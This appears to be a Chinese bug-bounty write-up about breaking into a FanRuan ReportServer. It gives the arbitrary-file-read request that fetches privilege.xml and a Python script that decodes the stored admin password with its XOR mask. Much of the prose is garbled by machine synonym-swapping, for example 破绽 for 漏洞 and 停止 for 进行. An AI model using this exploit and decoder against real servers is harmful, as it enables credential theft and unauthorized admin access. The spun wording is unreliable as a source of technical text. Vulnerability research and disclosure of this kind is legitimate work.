记录一次SRC挖掘经历

前言

看到某区发现帆软的组合破绽文章,忽然想起本人最近也挖到相似的,拿出来分享一下。

资产发现

首先是信息搜集子域名,谷歌语句直接site:xxx.com -www,一个登录口网站吸收了我的留意力。

我点击电信、网通、自动的时分,发现域名跳转到了真实IP

这样,就能够对真实IP停止端口扫描->目录扫描一把梭了,发如今8080端口发现ReportServe部署页面。

接着就对帆软的历史破绽停止测试了。

恣意文件读取获取密码解密登录后台

view-source:http://xxx.xxx.xxx.xxx:8080/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

刚开端的时分是空白页,查看源代码才发现信息

能够看到用户为posun,密码需求解密一下

解密脚本:

cipher = '___0022007c0039003b005100e3' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
    Password = Password + chr(c2)
print (Password)
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞10赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像插代0